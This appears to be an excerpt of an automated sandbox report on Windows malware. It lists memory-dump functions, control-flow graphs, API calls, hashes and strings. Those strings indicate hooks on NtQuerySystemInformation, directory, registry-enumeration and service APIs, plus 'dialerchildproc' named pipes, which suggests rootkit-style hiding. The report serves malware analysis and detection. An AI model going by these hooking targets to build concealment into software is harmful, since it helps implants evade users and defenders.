                                                                                                                                                              • Part of subcall function 00000230D9211628: RegCloseKey.ADVAPI32 ref: 00000230D92116F9
                                                                                                                                                              • Part of subcall function 00000230D9211628: RegOpenKeyExW.ADVAPI32 ref: 00000230D9211719
                                                                                                                                                              • Part of subcall function 00000230D9211628: RegCloseKey.ADVAPI32 ref: 00000230D9211734
                                                                                                                                                              • Part of subcall function 00000230D9211628: RegOpenKeyExW.ADVAPI32 ref: 00000230D9211754
                                                                                                                                                              • Part of subcall function 00000230D9211628: RegCloseKey.ADVAPI32 ref: 00000230D921176F
                                                                                                                                                              • Part of subcall function 00000230D9211628: RegOpenKeyExW.ADVAPI32 ref: 00000230D921178F
                                                                                                                                                              • Part of subcall function 00000230D9211628: RegCloseKey.ADVAPI32 ref: 00000230D92117AA
                                                                                                                                                              • Part of subcall function 00000230D9211628: RegOpenKeyExW.ADVAPI32 ref: 00000230D92117CA
                                                                                                                                                            • Sleep.KERNEL32 ref: 00000230D9211AD7
                                                                                                                                                            • SleepEx.KERNEL32 ref: 00000230D9211ADD
                                                                                                                                                              • Part of subcall function 00000230D9211628: RegCloseKey.ADVAPI32 ref: 00000230D92117E5
                                                                                                                                                              • Part of subcall function 00000230D9211628: RegOpenKeyExW.ADVAPI32 ref: 00000230D9211805
                                                                                                                                                              • Part of subcall function 00000230D9211628: RegCloseKey.ADVAPI32 ref: 00000230D9211820
                                                                                                                                                              • Part of subcall function 00000230D9211628: RegOpenKeyExW.ADVAPI32 ref: 00000230D9211840
                                                                                                                                                              • Part of subcall function 00000230D9211628: RegCloseKey.ADVAPI32 ref: 00000230D921185B
                                                                                                                                                              • Part of subcall function 00000230D9211628: RegOpenKeyExW.ADVAPI32 ref: 00000230D921187B
                                                                                                                                                              • Part of subcall function 00000230D9211628: RegCloseKey.ADVAPI32 ref: 00000230D9211896
                                                                                                                                                              • Part of subcall function 00000230D9211628: RegCloseKey.ADVAPI32 ref: 00000230D92118A0
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000005.00000002.2589942922.00000230D9210000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000230D9210000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_5_2_230d9210000_cmd.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CloseOpen$HeapSleep$AllocProcess
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1534210851-0
                                                                                                                                                            • Opcode ID: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                                                                                                                            • Instruction ID: bd4d2e9c0625bbb764bc332c2e8b443fa1079459ecabe054d4ae2ed16906a027
                                                                                                                                                            • Opcode Fuzzy Hash: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                                                                                                                            • Instruction Fuzzy Hash: CF31FE61A0074D95EBD49BA6D6EA2B923F5EB44BC0F0454219E09972DFEE3CC6B1C230
                                                                                                                                                            Function 00000230D90E273C Relevance: 1.7, APIs: 1, Instructions: 187libraryCOMMON
                                                                                                                                                            Download Yara Rule

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            • Executed
                                                                                                                                                            • Not Executed
                                                                                                                                                            control_flow_graph 128 230d90e273c-230d90e27a4 call 230d90e29d4 * 4 137 230d90e27aa-230d90e27ad 128->137 138 230d90e29b2 128->138 137->138 140 230d90e27b3-230d90e27b6 137->140 139 230d90e29b4-230d90e29d0 138->139 140->138 141 230d90e27bc-230d90e27bf 140->141 141->138 142 230d90e27c5-230d90e27e6 141->142 142->138 144 230d90e27ec-230d90e280c 142->144 145 230d90e280e-230d90e2836 144->145 146 230d90e2838-230d90e283f 144->146 145->145 145->146 147 230d90e28df-230d90e28e6 146->147 148 230d90e2845-230d90e2852 146->148 150 230d90e28ec-230d90e2901 147->150 151 230d90e2992-230d90e29b0 147->151 148->147 149 230d90e2858-230d90e286a LoadLibraryA 148->149 152 230d90e286c-230d90e2878 149->152 153 230d90e28ca-230d90e28d2 149->153 150->151 154 230d90e2907 150->154 151->139 156 230d90e28c5-230d90e28c8 152->156 153->149 157 230d90e28d4-230d90e28d9 153->157 155 230d90e290d-230d90e2921 154->155 159 230d90e2982-230d90e298c 155->159 160 230d90e2923-230d90e2934 155->160 156->153 161 230d90e287a-230d90e287d 156->161 157->147 159->151 159->155 162 230d90e293f-230d90e2943 160->162 163 230d90e2936-230d90e293d 160->163 164 230d90e287f-230d90e28a5 161->164 165 230d90e28a7-230d90e28b7 161->165 168 230d90e294d-230d90e2951 162->168 169 230d90e2945-230d90e294b 162->169 167 230d90e2970-230d90e2980 163->167 170 230d90e28ba-230d90e28c1 164->170 165->170 167->159 167->160 171 230d90e2963-230d90e2967 168->171 172 230d90e2953-230d90e2961 168->172 169->167 170->156 171->167 174 230d90e2969-230d90e296c 171->174 172->167 174->167
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000005.00000002.2582442342.00000230D90E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000230D90E0000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_5_2_230d90e0000_cmd.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: LibraryLoad
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1029625771-0
                                                                                                                                                            • Opcode ID: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                                                                                                                            • Instruction ID: d39e48a6f475af05e2240b0a3efc0b4b3904e5108dc5409c6a64f0ea3f98973b
                                                                                                                                                            • Opcode Fuzzy Hash: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                                                                                                                            • Instruction Fuzzy Hash: 3A614532F012988BDB54CF58B1A872DBBE2F754B94F189521EE598378CDA3CD952C720

                                                                                                                                                            Non-executed Functions

                                                                                                                                                            Function 00000230D9212B2C Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 264stringlibraryloaderCOMMON
                                                                                                                                                            Download Yara Rule

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            • Executed
                                                                                                                                                            • Not Executed
                                                                                                                                                            control_flow_graph 383 230d9212b2c-230d9212ba5 call 230d9232ce0 386 230d9212ee0-230d9212f03 383->386 387 230d9212bab-230d9212bb1 383->387 387->386 388 230d9212bb7-230d9212bba 387->388 388->386 389 230d9212bc0-230d9212bc3 388->389 389->386 390 230d9212bc9-230d9212bd9 GetModuleHandleA 389->390 391 230d9212bdb-230d9212beb call 230d9226090 390->391 392 230d9212bed 390->392 394 230d9212bf0-230d9212c0e 391->394 392->394 394->386 397 230d9212c14-230d9212c33 StrCmpNIW 394->397 397->386 398 230d9212c39-230d9212c3d 397->398 398->386 399 230d9212c43-230d9212c4d 398->399 399->386 400 230d9212c53-230d9212c5a 399->400 400->386 401 230d9212c60-230d9212c73 400->401 402 230d9212c83 401->402 403 230d9212c75-230d9212c81 401->403 404 230d9212c86-230d9212c8a 402->404 403->404 405 230d9212c9a 404->405 406 230d9212c8c-230d9212c98 404->406 407 230d9212c9d-230d9212ca7 405->407 406->407 408 230d9212d9d-230d9212da1 407->408 409 230d9212cad-230d9212cb0 407->409 410 230d9212ed2-230d9212eda 408->410 411 230d9212da7-230d9212daa 408->411 412 230d9212cc2-230d9212ccc 409->412 413 230d9212cb2-230d9212cbf call 230d921199c 409->413 410->386 410->401 414 230d9212dbb-230d9212dc5 411->414 415 230d9212dac-230d9212db8 call 230d921199c 411->415 417 230d9212d00-230d9212d0a 412->417 418 230d9212cce-230d9212cdb 412->418 413->412 422 230d9212df5-230d9212df8 414->422 423 230d9212dc7-230d9212dd4 414->423 415->414 419 230d9212d3a-230d9212d3d 417->419 420 230d9212d0c-230d9212d19 417->420 418->417 425 230d9212cdd-230d9212cea 418->425 427 230d9212d4b-230d9212d58 lstrlenW 419->427 428 230d9212d3f-230d9212d49 call 230d9211bbc 419->428 420->419 426 230d9212d1b-230d9212d28 420->426 431 230d9212e05-230d9212e12 lstrlenW 422->431 432 230d9212dfa-230d9212e03 call 230d9211bbc 422->432 423->422 430 230d9212dd6-230d9212de3 423->430 433 230d9212ced-230d9212cf3 425->433 436 230d9212d2b-230d9212d31 426->436 438 230d9212d7b-230d9212d8d call 230d9213844 427->438 439 230d9212d5a-230d9212d64 427->439 428->427 442 230d9212d93-230d9212d98 428->442 440 230d9212de6-230d9212dec 430->440 434 230d9212e35-230d9212e3f call 230d9213844 431->434 435 230d9212e14-230d9212e1e 431->435 432->431 450 230d9212e4a-230d9212e55 432->450 433->442 443 230d9212cf9-230d9212cfe 433->443 445 230d9212e42-230d9212e44 434->445 435->434 444 230d9212e20-230d9212e33 call 230d921152c 435->444 436->442 446 230d9212d33-230d9212d38 436->446 438->442 438->445 439->438 449 230d9212d66-230d9212d79 call 230d921152c 439->449 440->450 451 230d9212dee-230d9212df3 440->451 442->445 443->417 443->433 444->434 444->450 445->410 445->450 446->419 446->436 449->438 449->442 457 230d9212e57-230d9212e5b 450->457 458 230d9212ecc-230d9212ed0 450->458 451->422 451->440 461 230d9212e63-230d9212e7d call 230d92185c0 457->461 462 230d9212e5d-230d9212e61 457->462 458->410 464 230d9212e80-230d9212e83 461->464 462->461 462->464 466 230d9212e85-230d9212ea3 call 230d92185c0 464->466 467 230d9212ea6-230d9212ea9 464->467 466->467 467->458 470 230d9212eab-230d9212ec9 call 230d92185c0 467->470 470->458
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000005.00000002.2589942922.00000230D9210000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000230D9210000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_5_2_230d9210000_cmd.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                                                                                                                            • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                                                                                                                            • API String ID: 2119608203-3850299575
                                                                                                                                                            • Opcode ID: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                                                                                                                            • Instruction ID: 4df8ad31f9d618962450b3316a6f2fc5c37ac7844519bc7728c98898d03dfda6
                                                                                                                                                            • Opcode Fuzzy Hash: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                                                                                                                            • Instruction Fuzzy Hash: 7EB1AF22A10B9886EBE49FA5D4A87B963F5F744B84F545016EE096379CDF3CCE60C360
                                                                                                                                                            Function 00000230D9217D90 Relevance: 10.6, APIs: 7, Instructions: 72COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000005.00000002.2589942922.00000230D9210000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000230D9210000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_5_2_230d9210000_cmd.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3140674995-0
                                                                                                                                                            • Opcode ID: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                                                                                                                            • Instruction ID: 77ce8ed2ca58240ca858ac134fb53306f7d7ea2e70e147f0d027ce2dcebba178
                                                                                                                                                            • Opcode Fuzzy Hash: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                                                                                                                            • Instruction Fuzzy Hash: 99316173605B8889EBA09FA0E8943EE73B4F794744F44402ADA4D57B98EF3CC658C724
                                                                                                                                                            Function 00000230D921D2A4 Relevance: 9.1, APIs: 6, Instructions: 83COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000005.00000002.2589942922.00000230D9210000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000230D9210000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_5_2_230d9210000_cmd.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1239891234-0
                                                                                                                                                            • Opcode ID: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                                                                                                                            • Instruction ID: 435f343a4535463556e64cda5d0d32d62cbac6fd547637255f945f2beffd793c
                                                                                                                                                            • Opcode Fuzzy Hash: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                                                                                                                            • Instruction Fuzzy Hash: FD316E32A14F8486DBA0CF65E8943AE73B4F789754F500226EA9D53B99DF3CC255CB10
                                                                                                                                                            Function 00000230D92112BC Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 120memoryregistrystringCOMMON
                                                                                                                                                            Download Yara Rule

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000005.00000002.2589942922.00000230D9210000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000230D9210000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_5_2_230d9210000_cmd.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                                                                                                                            • String ID: d
                                                                                                                                                            • API String ID: 2005889112-2564639436
                                                                                                                                                            • Opcode ID: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                                                                                                                            • Instruction ID: 94f090a4ea1b9da7a59aabd88406e296442a5095b28ac35284df6f14610e4869
                                                                                                                                                            • Opcode Fuzzy Hash: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                                                                                                                            • Instruction Fuzzy Hash: E7516C32A00B8886EB90CFA2E4A836A77F1F789F89F044125DA490771DDF3CD259CB54
                                                                                                                                                            Function 00000230D9211D14 Relevance: 22.8, APIs: 1, Strings: 12, Instructions: 65threadCOMMON
                                                                                                                                                            Download Yara Rule

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000005.00000002.2589942922.00000230D9210000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000230D9210000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_5_2_230d9210000_cmd.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CurrentThread$AddressHandleModuleProc
                                                                                                                                                            • String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
                                                                                                                                                            • API String ID: 4175298099-1975688563
                                                                                                                                                            • Opcode ID: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                                                                                                                            • Instruction ID: f49e1c1d5dfc41138abfc7bc6b866f3a0e11a826746f152738e7f5ab8358d266
                                                                                                                                                            • Opcode Fuzzy Hash: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                                                                                                                            • Instruction Fuzzy Hash: 4B319F64D01B4EA0EA84EBE5E8F96F423B0F704344F915513E8092697EDE3C836AC374
                                                                                                                                                            Function 00000230D90E6910 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 230COMMON
                                                                                                                                                            Download Yara Rule

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            • Executed
                                                                                                                                                            • Not Executed
                                                                                                                                                            control_flow_graph 225 230d90e6910-230d90e6916 226 230d90e6918-230d90e691b 225->226 227 230d90e6951-230d90e695b 225->227 229 230d90e691d-230d90e6920 226->229 230 230d90e6945-230d90e6984 call 230d90e6fc0 226->230 228 230d90e6a78-230d90e6a8d 227->228 233 230d90e6a8f 228->233 234 230d90e6a9c-230d90e6ab6 call 230d90e6e54 228->234 231 230d90e6938 __scrt_dllmain_crt_thread_attach 229->231 232 230d90e6922-230d90e6925 229->232 248 230d90e698a-230d90e699f call 230d90e6e54 230->248 249 230d90e6a52 230->249 240 230d90e693d-230d90e6944 231->240 236 230d90e6927-230d90e6930 232->236 237 230d90e6931-230d90e6936 call 230d90e6f04 232->237 238 230d90e6a91-230d90e6a9b 233->238 246 230d90e6aef-230d90e6b20 call 230d90e7190 234->246 247 230d90e6ab8-230d90e6aed call 230d90e6f7c call 230d90e6e1c call 230d90e7318 call 230d90e7130 call 230d90e7154 call 230d90e6fac 234->247 237->240 257 230d90e6b22-230d90e6b28 246->257 258 230d90e6b31-230d90e6b37 246->258 247->238 260 230d90e6a6a-230d90e6a77 call 230d90e7190 248->260 261 230d90e69a5-230d90e69b6 call 230d90e6ec4 248->261 252 230d90e6a54-230d90e6a69 249->252 257->258 263 230d90e6b2a-230d90e6b2c 257->263 264 230d90e6b7e-230d90e6b94 call 230d90e268c 258->264 265 230d90e6b39-230d90e6b43 258->265 260->228 275 230d90e69b8-230d90e69dc call 230d90e72dc call 230d90e6e0c call 230d90e6e38 call 230d90eac0c 261->275 276 230d90e6a07-230d90e6a11 call 230d90e7130 261->276 270 230d90e6c1f-230d90e6c2c 263->270 283 230d90e6bcc-230d90e6bce 264->283 284 230d90e6b96-230d90e6b98 264->284 271 230d90e6b4f-230d90e6b5d call 230d90f5780 265->271 272 230d90e6b45-230d90e6b4d 265->272 278 230d90e6b63-230d90e6b78 call 230d90e6910 271->278 294 230d90e6c15-230d90e6c1d 271->294 272->278 275->276 328 230d90e69de-230d90e69e5 __scrt_dllmain_after_initialize_c 275->328 276->249 296 230d90e6a13-230d90e6a1f call 230d90e7180 276->296 278->264 278->294 292 230d90e6bd5-230d90e6bea call 230d90e6910 283->292 293 230d90e6bd0-230d90e6bd3 283->293 284->283 291 230d90e6b9a-230d90e6bbc call 230d90e268c call 230d90e6a78 284->291 291->283 322 230d90e6bbe-230d90e6bc6 call 230d90f5780 291->322 292->294 307 230d90e6bec-230d90e6bf6 292->307 293->292 293->294 294->270 315 230d90e6a45-230d90e6a50 296->315 316 230d90e6a21-230d90e6a2b call 230d90e7098 296->316 312 230d90e6bf8-230d90e6bff 307->312 313 230d90e6c01-230d90e6c11 call 230d90f5780 307->313 312->294 313->294 315->252 316->315 327 230d90e6a2d-230d90e6a3b 316->327 322->283 327->315 328->276 329 230d90e69e7-230d90e6a04 call 230d90eabc8 328->329 329->276
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000005.00000002.2582442342.00000230D90E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000230D90E0000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_5_2_230d90e0000_cmd.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                                                                                            • String ID: `dynamic initializer for '$`eh vector copy constructor iterator'$`eh vector vbase copy constructor iterator'$scriptor'
                                                                                                                                                            • API String ID: 190073905-1786718095
                                                                                                                                                            • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                                                                                                            • Instruction ID: 58654070a96cdc787a371039887cd8e801867bc4b86fccfe3ec5b20bd3060170
                                                                                                                                                            • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                                                                                                            • Instruction Fuzzy Hash: BA81D121E0060D8EFA549BE5B4F93696EF1EB85780F184815B909C339FDB3DCB858720
                                                                                                                                                            Function 00000230D921CE28 Relevance: 18.1, APIs: 12, Instructions: 112COMMONLIBRARYCODE
                                                                                                                                                            Download Yara Rule

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            APIs
                                                                                                                                                            • GetLastError.KERNEL32 ref: 00000230D921CE37
                                                                                                                                                            • FlsGetValue.KERNEL32(?,?,?,00000230D9220A6B,?,?,?,00000230D922045C,?,?,?,00000230D921C84F), ref: 00000230D921CE4C
                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00000230D9220A6B,?,?,?,00000230D922045C,?,?,?,00000230D921C84F), ref: 00000230D921CE6D
                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00000230D9220A6B,?,?,?,00000230D922045C,?,?,?,00000230D921C84F), ref: 00000230D921CE9A
                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00000230D9220A6B,?,?,?,00000230D922045C,?,?,?,00000230D921C84F), ref: 00000230D921CEAB
                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00000230D9220A6B,?,?,?,00000230D922045C,?,?,?,00000230D921C84F), ref: 00000230D921CEBC
                                                                                                                                                            • SetLastError.KERNEL32 ref: 00000230D921CED7
                                                                                                                                                            • FlsGetValue.KERNEL32(?,?,?,?,?,?,?,00000230D9220A6B,?,?,?,00000230D922045C,?,?,?,00000230D921C84F), ref: 00000230D921CF0D
                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,00000001,00000230D921ECCC,?,?,?,?,00000230D921BF9F,?,?,?,?,?,00000230D9217AB0), ref: 00000230D921CF2C
                                                                                                                                                              • Part of subcall function 00000230D921D6CC: HeapAlloc.KERNEL32 ref: 00000230D921D721
                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00000230D9220A6B,?,?,?,00000230D922045C,?,?,?,00000230D921C84F), ref: 00000230D921CF54
                                                                                                                                                              • Part of subcall function 00000230D921D744: HeapFree.KERNEL32 ref: 00000230D921D75A
                                                                                                                                                              • Part of subcall function 00000230D921D744: GetLastError.KERNEL32 ref: 00000230D921D764
                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00000230D9220A6B,?,?,?,00000230D922045C,?,?,?,00000230D921C84F), ref: 00000230D921CF65
                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00000230D9220A6B,?,?,?,00000230D922045C,?,?,?,00000230D921C84F), ref: 00000230D921CF76
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000005.00000002.2589942922.00000230D9210000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000230D9210000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_5_2_230d9210000_cmd.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Value$ErrorLast$Heap$AllocFree
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 570795689-0
                                                                                                                                                            • Opcode ID: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                                                                                                                            • Instruction ID: 16fe86365a86596bd5ed5ec5f0f4d457f5da2ac12593bb3ae784f79da4420bc4
                                                                                                                                                            • Opcode Fuzzy Hash: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                                                                                                                            • Instruction Fuzzy Hash: D2415E28F0138C42FAE8B7E155FE37922F1DB457B0F140724A93666ADEDF2C97218220
                                                                                                                                                            Function 00000230D9212244 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52filethreadCOMMON
                                                                                                                                                            Download Yara Rule

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000005.00000002.2589942922.00000230D9210000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000230D9210000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_5_2_230d9210000_cmd.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
                                                                                                                                                            • String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
                                                                                                                                                            • API String ID: 2171963597-1373409510
                                                                                                                                                            • Opcode ID: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                                                                                                                            • Instruction ID: 59b3247658fe2f08d417da958787f5a6aff13a47acc3444d85e732c4f9f5d631
                                                                                                                                                            • Opcode Fuzzy Hash: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                                                                                                                            • Instruction Fuzzy Hash: 6C214F36A1475482FB508B65F4A836A73F0F789BA4F500215EA5903BACCF7CC249CB14
                                                                                                                                                            Function 00000230D921A544 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317COMMON
                                                                                                                                                            Download Yara Rule

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            • Executed
                                                                                                                                                            • Not Executed
                                                                                                                                                            control_flow_graph 604 230d921a544-230d921a5ac call 230d921b414 607 230d921aa13-230d921aa1b call 230d921c748 604->607 608 230d921a5b2-230d921a5b5 604->608 608->607 609 230d921a5bb-230d921a5c1 608->609 611 230d921a690-230d921a6a2 609->611 612 230d921a5c7-230d921a5cb 609->612 614 230d921a963-230d921a967 611->614 615 230d921a6a8-230d921a6ac 611->615 612->611 616 230d921a5d1-230d921a5dc 612->616 619 230d921a9a0-230d921a9aa call 230d9219634 614->619 620 230d921a969-230d921a970 614->620 615->614 617 230d921a6b2-230d921a6bd 615->617 616->611 618 230d921a5e2-230d921a5e7 616->618 617->614 621 230d921a6c3-230d921a6ca 617->621 618->611 622 230d921a5ed-230d921a5f7 call 230d9219634 618->622 619->607 633 230d921a9ac-230d921a9cb call 230d9217940 619->633 620->607 623 230d921a976-230d921a99b call 230d921aa1c 620->623 625 230d921a6d0-230d921a707 call 230d9219a10 621->625 626 230d921a894-230d921a8a0 621->626 622->633 638 230d921a5fd-230d921a628 call 230d9219634 * 2 call 230d9219d24 622->638 623->619 625->626 642 230d921a70d-230d921a715 625->642 626->619 630 230d921a8a6-230d921a8aa 626->630 635 230d921a8ba-230d921a8c2 630->635 636 230d921a8ac-230d921a8b8 call 230d9219ce4 630->636 635->619 641 230d921a8c8-230d921a8d5 call 230d92198b4 635->641 636->635 648 230d921a8db-230d921a8e3 636->648 673 230d921a648-230d921a652 call 230d9219634 638->673 674 230d921a62a-230d921a62e 638->674 641->619 641->648 646 230d921a719-230d921a74b 642->646 650 230d921a751-230d921a75c 646->650 651 230d921a887-230d921a88e 646->651 653 230d921a9f6-230d921aa12 call 230d9219634 * 2 call 230d921c6a8 648->653 654 230d921a8e9-230d921a8ed 648->654 650->651 655 230d921a762-230d921a77b 650->655 651->626 651->646 653->607 657 230d921a900 654->657 658 230d921a8ef-230d921a8fe call 230d9219ce4 654->658 659 230d921a781-230d921a7c6 call 230d9219cf8 * 2 655->659 660 230d921a874-230d921a879 655->660 663 230d921a903-230d921a90d call 230d921b4ac 657->663 658->663 685 230d921a804-230d921a80a 659->685 686 230d921a7c8-230d921a7ee call 230d9219cf8 call 230d921ac38 659->686 666 230d921a884 660->666 663->619 683 230d921a913-230d921a961 call 230d9219944 call 230d9219b50 663->683 666->651 673->611 689 230d921a654-230d921a674 call 230d9219634 * 2 call 230d921b4ac 673->689 674->673 676 230d921a630-230d921a63b 674->676 676->673 682 230d921a63d-230d921a642 676->682 682->607 682->673 683->619 693 230d921a87b 685->693 694 230d921a80c-230d921a810 685->694 704 230d921a7f0-230d921a802 686->704 705 230d921a815-230d921a872 call 230d921a470 686->705 710 230d921a676-230d921a680 call 230d921b59c 689->710 711 230d921a68b 689->711 698 230d921a880 693->698 694->659 698->666 704->685 704->686 705->698 714 230d921a9f0-230d921a9f5 call 230d921c6a8 710->714 715 230d921a686-230d921a9ef call 230d92192ac call 230d921aff4 call 230d92194a0 710->715 711->611 714->653 715->714
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000005.00000002.2589942922.00000230D9210000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000230D9210000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_5_2_230d9210000_cmd.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                                                            • String ID: csm$csm$csm
                                                                                                                                                            • API String ID: 849930591-393685449
                                                                                                                                                            • Opcode ID: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                                                                                                                            • Instruction ID: f08a9352c1be0a61195cb87c1089dd68b934e45654db61afe8aa301cfc99ad14
                                                                                                                                                            • Opcode Fuzzy Hash: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
